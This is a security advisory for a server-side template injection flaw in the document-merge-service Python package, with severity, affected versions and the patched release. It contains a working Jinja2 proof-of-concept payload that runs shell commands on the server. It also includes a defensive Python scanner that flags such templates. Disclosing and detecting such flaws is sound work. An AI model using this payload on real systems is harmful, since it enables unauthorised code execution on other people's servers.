GHSA-v5gf-r78h-55q6

Source
https://github.com/advisories/GHSA-v5gf-r78h-55q6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-v5gf-r78h-55q6/GHSA-v5gf-r78h-55q6.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-v5gf-r78h-55q6
Aliases
Published
2024-06-11T20:22:55Z
Modified
2024-10-16T17:21:53.936882Z
Severity
  • 9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Summary
document-merge-service vulnerable to Remote Code Execution via Server-Side Template Injection
Details

Impact

A remote code execution (RCE) via server-side template injection (SSTI) allows user-supplied code to be executed in the server's context. The code runs as the document-merge-server user (UID 901), giving an attacker considerable control over the container.

Patches

The vulnerability has been patched in v6.5.2.

References

  • https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti

POC

Add the following to a document, upload and render it:

{% if PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202] %} 
ls -a: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("ls -a", shell=True, stdout=-1).communicate()[0].strip() }}

whoami: {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("whoami", shell=True, stdout=-1).communicate()[0].strip() }}

uname -a:
{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__()[202]("uname -a", shell=True, stdout=-1).communicate()[0].strip() }}

{% endif %}

The index might differ between deployments. To find it, first render a template containing {{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}, locate the index of subprocess.Popen in the output, and replace 202 with that value.
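As an added defender-side example (not code from the advisory or from document-merge-service): a pre-render check over uploaded template source that rejects templates whose expressions walk Python internals, as the PoC above does, instead of only substituting data fields. It complements rendering inside Jinja2's SandboxedEnvironment rather than replacing it; the sample templates are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# Jinja2 expression ({{ }}) and statement ({% %}) tags, default delimiters.
TAG_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)
# Dunder attribute access, dotted or as a string subscript. The gadget chain
# in the advisory walks __class__ -> __mro__ -> __subclasses__.
DUNDER_RE = re.compile(r"(?:\.|\[\s*['\"])__[A-Za-z0-9_]+__")
# Jinja's attr filter and getattr helpers reach attributes by string name,
# so a data-only template has no legitimate use for them either.
HELPER_RE = re.compile(r"\b(?:getattr|attr)\s*\(|\|\s*attr\b")


@dataclass
class Finding:
    line: int      # 1-based line in the template source
    reason: str
    snippet: str   # the offending tag body, stripped


def scan_template(source: str) -> List[Finding]:
    """Return one Finding per template tag that touches Python internals."""
    findings = []
    for m in TAG_RE.finditer(source):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        line = source.count("\n", 0, m.start()) + 1
        if DUNDER_RE.search(body):
            findings.append(Finding(line, "dunder attribute access", body.strip()))
        elif HELPER_RE.search(body):
            findings.append(Finding(line, "attr/getattr helper", body.strip()))
    return findings


def is_safe_to_render(source: str) -> bool:
    """Gate to call before handing an uploaded template to the renderer."""
    return not scan_template(source)


# Constructed samples: a normal merge template and the advisory's index probe.
BENIGN = "Dear {{ customer.name }}, invoice {{ invoice.number }} is attached."
PROBE = "{{ PLACEHOLDER.__class__.__mro__[1].__subclasses__() }}"
MULTILINE = "Report\n{% if PLACEHOLDER.__class__.__mro__ %}\nx\n{% endif %}\n"

if __name__ == "__main__":
    for name, tpl in [("benign", BENIGN), ("probe", PROBE), ("multiline", MULTILINE)]:
        print(name, "safe" if is_safe_to_render(tpl) else scan_template(tpl))
```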


Database specific
{
    "nvd_published_at": "2024-06-11T19:16:07Z",
    "cwe_ids": [
        "CWE-1336"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-11T20:22:55Z"
}

Affected packages

PyPI / document-merge-service

Package

Name
document-merge-service
Purl
pkg:pypi/document-merge-service

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
6.5.2

Affected versions

5.*

5.2.0
5.2.1

6.*

6.0.0
6.1.0
6.1.1
6.1.2
6.2.0
6.2.1
6.2.2
6.3.0
6.3.1
6.4.0
6.4.1
6.4.2
6.4.3
6.4.4
6.4.5
6.4.6
6.5.0
6.5.1